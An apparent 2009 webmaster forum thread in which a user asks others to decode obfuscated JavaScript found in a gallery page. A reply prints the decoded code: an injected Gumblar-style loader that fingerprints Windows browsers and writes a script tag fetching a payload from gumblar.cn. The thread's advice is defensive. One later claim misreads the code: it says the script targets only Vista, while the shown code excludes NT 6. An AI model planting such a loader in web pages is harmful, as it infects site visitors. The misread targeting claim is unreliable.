|
2009-05-01, 08:31 AM | #1 |
Lonewolf Internet Sales
|
convert encoded javascript?
I found this snippet in the head of a gallery. Javascript is not my forté, so I've not been having much success decoding it to determine if it's malicious or benign.
Any javascript gurus around here that can turn this back into readable code? PHP Code:
|
2009-05-01, 08:40 AM | #2 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
That is bad stuff, comes from an FTP exploit. Change your FTP password, have your host check your FTP logs. I would suspect hundreds if not thousands of files have been affected. Scan your machine for spyware/keyloggers/malware and don't use the same password as before.
Code:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src="//gumblar.cn/rss/?id=%22+j+%22"><\/script>");}
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
2009-05-01, 08:52 AM | #3 |
Lonewolf Internet Sales
|
Thanks, I figured it was most likely malicious since it was so heavily encoded.
Fortunately it's not on my box. But I will let the owner know he has a serious problem. |
2009-05-01, 09:01 AM | #4 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
If you use Firefox, you can get the Web Developer Toolbar, which has a View Source/View Generated Source link. Problem is, if you've viewed the page, and the machine you're on is able to get the virus, you would have run the exploit.
This particular one only displays for the OS of machines that are exploitable, so, if you aren't running Windows Vista (NT6), it wouldn't even attempt the exploit.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
|
|